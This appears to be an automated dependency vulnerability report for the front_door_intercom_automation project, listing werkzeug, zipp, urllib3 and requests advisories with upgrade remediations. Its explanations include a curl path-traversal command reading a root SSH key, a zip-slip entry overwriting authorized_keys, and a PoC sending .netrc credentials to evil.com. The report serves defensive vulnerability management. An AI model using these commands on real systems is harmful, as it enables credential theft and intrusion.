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high severity
- Vulnerable module: werkzeug
- Introduced through: werkzeug@2.2.3, flask@2.2.5 and others
Detailed paths
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › werkzeug@2.2.3Remediation: Upgrade to werkzeug@3.0.3.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › flask@2.2.5 › werkzeug@2.2.3Remediation: Upgrade to flask@2.2.5.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › flask-httpauth@4.8.0 › flask@2.2.5 › werkzeug@2.2.3
Overview
Affected versions of this package are vulnerable to Remote Code Execution (RCE) due to insufficient hostname checks and the use of relative paths to resolve requests. When the debugger is enabled, an attacker can convince a user to enter their own PIN to interact with a domain and subdomain they control, and thereby cause malicious code to be executed.
The demonstrated attack vector requires a number of conditions that render this attack very difficult to achieve, especially if the victim application is running in the recommended configuration of not having the debugger enabled in production.
Remediation
Upgrade werkzeug
to version 3.0.3 or higher.
References
medium severity
- Vulnerable module: werkzeug
- Introduced through: werkzeug@2.2.3, flask@2.2.5 and others
Detailed paths
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › werkzeug@2.2.3Remediation: Upgrade to werkzeug@3.0.6.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › flask@2.2.5 › werkzeug@2.2.3Remediation: Upgrade to flask@2.2.5.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › flask-httpauth@4.8.0 › flask@2.2.5 › werkzeug@2.2.3
Overview
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in formparser.MultiPartParser()
. An attacker can cause the parser to consume more memory than the upload size, in excess of max_form_memory_size
, by sending malicious data in a non-file field of a multipart/form-data
request.
Remediation
Upgrade werkzeug
to version 3.0.6 or higher.
References
medium severity
- Vulnerable module: zipp
- Introduced through: zipp@3.15.0, click@8.1.8 and others
Detailed paths
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › zipp@3.15.0Remediation: Upgrade to zipp@3.19.1.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › click@8.1.8 › importlib-metadata@6.7.0 › zipp@3.15.0Remediation: Upgrade to click@8.2.0.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › flask@2.2.5 › importlib-metadata@6.7.0 › zipp@3.15.0Remediation: Upgrade to flask@2.3.3.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › sphinx@5.3.0 › importlib-metadata@6.7.0 › zipp@3.15.0Remediation: Upgrade to sphinx@5.3.0.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › flask@2.2.5 › click@8.1.8 › importlib-metadata@6.7.0 › zipp@3.15.0Remediation: Upgrade to flask@2.3.3.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › flask-httpauth@4.8.0 › flask@2.2.5 › importlib-metadata@6.7.0 › zipp@3.15.0
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › recommonmark@0.7.1 › sphinx@5.3.0 › importlib-metadata@6.7.0 › zipp@3.15.0
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › sphinx-rtd-theme@2.0.0 › sphinx@5.3.0 › importlib-metadata@6.7.0 › zipp@3.15.0Remediation: Upgrade to sphinx-rtd-theme@3.0.0.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › flask-httpauth@4.8.0 › flask@2.2.5 › click@8.1.8 › importlib-metadata@6.7.0 › zipp@3.15.0
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › sphinx-rtd-theme@2.0.0 › sphinxcontrib-jquery@4.1 › sphinx@5.3.0 › importlib-metadata@6.7.0 › zipp@3.15.0Remediation: Upgrade to sphinx-rtd-theme@3.0.0.
Overview
Affected versions of this package are vulnerable to Infinite loop where an attacker can cause the application to stop responding by initiating a loop through functions affecting the Path
module, such as joinpath
, the overloaded division operator, and iterdir
.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
ws
package
Remediation
Upgrade zipp
to version 3.19.1 or higher.
References
medium severity
- Vulnerable module: werkzeug
- Introduced through: werkzeug@2.2.3, flask@2.2.5 and others
Detailed paths
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › werkzeug@2.2.3Remediation: Upgrade to werkzeug@2.3.8.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › flask@2.2.5 › werkzeug@2.2.3Remediation: Upgrade to flask@2.2.5.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › flask-httpauth@4.8.0 › flask@2.2.5 › werkzeug@2.2.3
Overview
Affected versions of this package are vulnerable to Inefficient Algorithmic Complexity in multipart data parsing. An attacker can cause a denial of service and block worker processes from handling legitimate requests by sending crafted multipart data to an endpoint that will parse it, eventually exhausting or killing all available workers.
Exploiting this vulnerability is possible if the uploaded file starts with CR
or LF
and is followed by megabytes of data without these characters.
Remediation
Upgrade werkzeug
to version 2.3.8, 3.0.1 or higher.
References
medium severity
- Vulnerable module: werkzeug
- Introduced through: werkzeug@2.2.3, flask@2.2.5 and others
Detailed paths
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › werkzeug@2.2.3Remediation: Upgrade to werkzeug@3.0.6.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › flask@2.2.5 › werkzeug@2.2.3Remediation: Upgrade to flask@2.2.5.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › flask-httpauth@4.8.0 › flask@2.2.5 › werkzeug@2.2.3
Overview
Werkzeug is a WSGI web application library.
Affected versions of this package are vulnerable to Directory Traversal due to a bypass for os.path.isabs()
, which allows the improper handling of UNC paths beginning with /
, in the safe_join()
function. This allows an attacker to read some files on the affected server, if they are stored in an affected path.
Note: This is only exploitable on Windows systems using Python versions prior to 3.11.
Details
A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.
Directory Traversal vulnerabilities can be generally divided into two types:
- Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.
st
is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public
route.
If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.
curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
Note %2e
is the URL encoded version of .
(dot).
- Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as
Zip-Slip
.
One way to achieve this is by using a malicious zip
archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.
The following is an example of a zip
archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/
overwriting the authorized_keys
file:
2018-04-15 22:04:29 ..... 19 19 good.txt
2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys
Remediation
Upgrade Werkzeug
to version 3.0.6 or higher.
References
medium severity
- Vulnerable module: urllib3
- Introduced through: urllib3@2.0.7, requests@2.31.0 and others
Detailed paths
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › urllib3@2.0.7Remediation: Upgrade to urllib3@2.2.2.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › requests@2.31.0 › urllib3@2.0.7Remediation: Upgrade to requests@2.32.0.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › sphinx@5.3.0 › requests@2.31.0 › urllib3@2.0.7Remediation: Upgrade to sphinx@5.3.0.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › recommonmark@0.7.1 › sphinx@5.3.0 › requests@2.31.0 › urllib3@2.0.7
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › sphinx-rtd-theme@2.0.0 › sphinx@5.3.0 › requests@2.31.0 › urllib3@2.0.7Remediation: Upgrade to sphinx-rtd-theme@3.0.0.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › sphinx-rtd-theme@2.0.0 › sphinxcontrib-jquery@4.1 › sphinx@5.3.0 › requests@2.31.0 › urllib3@2.0.7Remediation: Upgrade to sphinx-rtd-theme@3.0.0.
Overview
urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.
Affected versions of this package are vulnerable to Improper Removal of Sensitive Information Before Storage or Transfer due to the improper handling of the Proxy-Authorization
header during cross-origin redirects when ProxyManager
is not in use. When the conditions below are met, including non-recommended configurations, the contents of this header can be sent in an automatic HTTP redirect.
Notes:
To be vulnerable, the application must be doing all of the following:
Setting the
Proxy-Authorization
header without using urllib3's built-in proxy support.Not disabling HTTP redirects (e.g. with
redirects=False
)Either not using an HTTPS origin server, or having a proxy or target origin that redirects to a malicious origin.
Workarounds
Using the
Proxy-Authorization
header with urllib3'sProxyManager
.Disabling HTTP redirects using
redirects=False
when sending requests.Not using the
Proxy-Authorization
header.
Remediation
Upgrade urllib3
to version 1.26.19, 2.2.2 or higher.
References
medium severity
- Vulnerable module: urllib3
- Introduced through: urllib3@2.0.7, requests@2.31.0 and others
Detailed paths
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › urllib3@2.0.7Remediation: Upgrade to urllib3@2.5.0.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › requests@2.31.0 › urllib3@2.0.7Remediation: Upgrade to requests@2.32.0.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › sphinx@5.3.0 › requests@2.31.0 › urllib3@2.0.7Remediation: Upgrade to sphinx@5.3.0.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › recommonmark@0.7.1 › sphinx@5.3.0 › requests@2.31.0 › urllib3@2.0.7
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › sphinx-rtd-theme@2.0.0 › sphinx@5.3.0 › requests@2.31.0 › urllib3@2.0.7Remediation: Upgrade to sphinx-rtd-theme@3.0.0.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › sphinx-rtd-theme@2.0.0 › sphinxcontrib-jquery@4.1 › sphinx@5.3.0 › requests@2.31.0 › urllib3@2.0.7Remediation: Upgrade to sphinx-rtd-theme@3.0.0.
Overview
urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.
Affected versions of this package are vulnerable to Open Redirect due to the retries
parameter being ignored during PoolManager
instantiation. An attacker can access unintended resources or endpoints by leveraging automatic redirects when the application expects redirects to be disabled at the connection pool level.
Note:
requests
and botocore
users are not affected.
Workaround
This can be mitigated by disabling redirects at the request()
level instead of the PoolManager()
level.
Remediation
Upgrade urllib3
to version 2.5.0 or higher.
References
medium severity
- Vulnerable module: requests
- Introduced through: requests@2.31.0, sphinx@5.3.0 and others
Detailed paths
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › requests@2.31.0Remediation: Upgrade to requests@2.32.4.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › sphinx@5.3.0 › requests@2.31.0Remediation: Upgrade to sphinx@5.3.0.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › recommonmark@0.7.1 › sphinx@5.3.0 › requests@2.31.0
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › sphinx-rtd-theme@2.0.0 › sphinx@5.3.0 › requests@2.31.0Remediation: Upgrade to sphinx-rtd-theme@3.0.0.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › sphinx-rtd-theme@2.0.0 › sphinxcontrib-jquery@4.1 › sphinx@5.3.0 › requests@2.31.0Remediation: Upgrade to sphinx-rtd-theme@3.0.0.
Overview
Affected versions of this package are vulnerable to Insertion of Sensitive Information Into Sent Data due to incorrect URL processing. An attacker could craft a malicious URL that, when processed by the library, tricks it into sending the victim's .netrc
credentials to a server controlled by the attacker.
Note:
This is only exploitable if the .netrc
file contains an entry for the hostname that the attacker includes in the crafted URL's "intended" part (e.g., example.com
in http://example.com:@evil.com/
).
PoC
requests.get('http://example.com:@evil.com/')
Remediation
Upgrade requests
to version 2.32.4 or higher.
References
medium severity
- Vulnerable module: requests
- Introduced through: requests@2.31.0, sphinx@5.3.0 and others
Detailed paths
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › requests@2.31.0Remediation: Upgrade to requests@2.32.2.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › sphinx@5.3.0 › requests@2.31.0Remediation: Upgrade to sphinx@5.3.0.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › recommonmark@0.7.1 › sphinx@5.3.0 › requests@2.31.0
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › sphinx-rtd-theme@2.0.0 › sphinx@5.3.0 › requests@2.31.0Remediation: Upgrade to sphinx-rtd-theme@3.0.0.
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › sphinx-rtd-theme@2.0.0 › sphinxcontrib-jquery@4.1 › sphinx@5.3.0 › requests@2.31.0Remediation: Upgrade to sphinx-rtd-theme@3.0.0.
Overview
Affected versions of this package are vulnerable to Always-Incorrect Control Flow Implementation when making requests through a Requests Session
. An attacker can bypass certificate verification by making the first request with verify=False
, causing all subsequent requests to ignore certificate verification regardless of changes to the verify
value.
Notes:
For requests <2.32.0, avoid setting
verify=False
for the first request to a host while using a Requests Session.For requests <2.32.0, call
close()
on Session objects to clear existing connections ifverify=False
is used.This vulnerability was initially fixed in version 2.32.0, which was yanked. Therefore, the next available fixed version is 2.32.2.
Remediation
Upgrade requests
to version 2.32.2 or higher.
References
medium severity
- Module: certifi
- Introduced through: requests@2.31.0, sphinx@5.3.0 and others
Detailed paths
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › requests@2.31.0 › certifi@2025.8.3
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › sphinx@5.3.0 › requests@2.31.0 › certifi@2025.8.3
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › recommonmark@0.7.1 › sphinx@5.3.0 › requests@2.31.0 › certifi@2025.8.3
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › sphinx-rtd-theme@2.0.0 › sphinx@5.3.0 › requests@2.31.0 › certifi@2025.8.3
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Introduced through: OliverDrechsler/front_door_intercom_automation@OliverDrechsler/front_door_intercom_automation#02e1728905d85628ac18cb88488f5e64949bdd07 › sphinx-rtd-theme@2.0.0 › sphinxcontrib-jquery@4.1 › sphinx@5.3.0 › requests@2.31.0 › certifi@2025.8.3
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